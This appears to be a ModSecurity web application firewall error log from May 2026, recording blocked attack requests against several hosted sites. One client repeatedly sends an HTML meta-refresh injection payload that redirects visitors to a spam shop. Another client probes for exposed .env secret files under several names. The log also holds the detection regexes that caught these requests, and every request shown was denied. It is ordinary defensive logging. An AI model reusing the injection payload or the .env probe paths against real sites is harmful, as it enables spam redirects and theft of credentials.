[Tue May 12 06:13:36.896755 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
[Tue May 12 06:13:36.896940 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
[Tue May 12 06:13:36.897065 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
[Tue May 12 06:13:36.897244 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
[Tue May 12 06:13:36.897674 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
[Tue May 12 06:13:36.897964 2026] [security2:error] [pid 1844863:tid 1844893] [client 27.78.84.116:54709] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo8PaAnTZtx1_H_wzE-AAAAVg"]
[Tue May 12 06:13:41.594825 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:41.595254 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:41.595409 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:41.595531 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:41.595708 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:41.596146 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:41.596401 2026] [security2:error] [pid 1808852:tid 1808865] [client 27.78.84.116:55106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo9RfeipD4uoG21Fo-wwAAAAo"]
[Tue May 12 06:13:43.117159 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env"] [unique_id "agKo99r1yOh9TvizezisnwAAAE4"]
[Tue May 12 06:13:43.117384 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env"] [unique_id "agKo99r1yOh9TvizezisnwAAAE4"]
[Tue May 12 06:13:43.681094 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo99r1yOh9TvizezisnwAAAE4"]
[Tue May 12 06:13:43.989761 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.bak"] [unique_id "agKo99r1yOh9TvizezissQAAAE4"]
[Tue May 12 06:13:43.989980 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.bak"] [unique_id "agKo99r1yOh9TvizezissQAAAE4"]
[Tue May 12 06:13:44.560740 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo99r1yOh9TvizezissQAAAE4"]
[Tue May 12 06:13:44.600815 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.save"] [unique_id "agKo-Nr1yOh9TvizezistAAAAE4"]
[Tue May 12 06:13:44.601046 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.save"] [unique_id "agKo-Nr1yOh9TvizezistAAAAE4"]
[Tue May 12 06:13:45.170303 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo-Nr1yOh9TvizezistAAAAE4"]
[Tue May 12 06:13:45.213200 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.backup"] [unique_id "agKo-dr1yOh9TvizezistQAAAE4"]
[Tue May 12 06:13:45.213422 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.backup"] [unique_id "agKo-dr1yOh9TvizezistQAAAE4"]
[Tue May 12 06:13:45.763400 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKo-dr1yOh9TvizezistQAAAE4"]
[Tue May 12 06:13:45.805963 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/backend/.env"] [unique_id "agKo-dr1yOh9TvizezistgAAAE4"]
[Tue May 12 06:13:45.806180 2026] [security2:error] [pid 1825179:tid 1825212] [client 195.178.110.223:38188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/backend/.env"] [unique_id "agKo-dr1yOh9TvizezistgAAAE4"]
[Tue May 12 06:13:46.347425 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://s.aleoklop.atarget=\\x5c\\x22_blank\\x5c\\x22 hrefmailto:e@ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
[Tue May 12 06:13:46.347864 2026] [security2:error] [pid 1842385:tid 1842412] [client 27.78.84.116:55491] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh con..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKo-hs7kySIUZ3ORnI0CwAAARU"]
